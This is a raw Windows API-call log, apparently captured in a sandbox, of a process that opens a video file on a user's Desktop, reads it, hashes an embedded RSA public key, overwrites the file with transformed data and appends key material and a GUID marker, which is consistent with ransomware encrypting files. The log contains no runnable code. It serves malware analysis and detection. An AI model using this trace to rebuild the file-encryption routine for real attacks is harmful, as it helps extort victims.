lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab48eb30, ftCreationTime.dwHighDateTime=0x1d8a020, ftLastAccessTime.dwLowDateTime=0xca94c40, ftLastAccessTime.dwHighDateTime=0x1d8a110, ftLastWriteTime.dwLowDateTime=0xca94c40, ftLastWriteTime.dwHighDateTime=0x1d8a110, nFileSizeHigh=0x0, nFileSizeLow=0x5bec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L-TI2NVRPaCP-tk9F.mkv", cAlternateFileName="L-TI2N~1.MKV")) returned 1 [0192.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95338 [0192.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0192.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95338 | out: hHeap=0x620000) returned 1 [0192.608] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\L-TI2NVRPaCP-tk9F.mkv") returned=".mkv" [0192.608] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\L-TI2NVRPaCP-tk9F.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\l-ti2nvrpacp-tk9f.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.608] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=23532) returned 1 [0192.608] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.611] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5bc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.611] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.613] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.614] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x5bec, lpOverlapped=0x0) returned 1 [0192.614] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.614] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.615] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.617] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.617] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.617] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.617] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.617] GetLastError () returned 0x0 [0192.617] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.617] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.617] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.617] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.617] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5bf0) returned 0x2e9ea68 [0192.618] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95338 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93600 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95380 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93618 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93660 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.619] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4660 [0192.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4660 | out: hHeap=0x620000) returned 1 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93660 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93648 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.622] GetCurrentThreadId () returned 0x66c [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64e650 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.622] GetCurrentThreadId () returned 0x66c [0192.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93648 [0192.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93660 [0192.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93630 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936c0 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93690 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93678 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936d8 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93678 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93690 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93648 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4660 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4870 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93648 | out: hHeap=0x620000) returned 1 [0192.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4a88 [0192.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4870 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a88 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93678 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93660 | out: hHeap=0x620000) returned 1 [0192.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93630 | out: hHeap=0x620000) returned 1 [0192.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93618 | out: hHeap=0x620000) returned 1 [0192.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95380 | out: hHeap=0x620000) returned 1 [0192.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4660 | out: hHeap=0x620000) returned 1 [0192.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.633] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ea68*, nNumberOfBytesToWrite=0x5be7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e9ea68*, lpNumberOfBytesWritten=0x312fb14*=0x5be7, lpOverlapped=0x0) returned 1 [0192.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.634] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5bec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.634] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.636] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.636] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.636] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 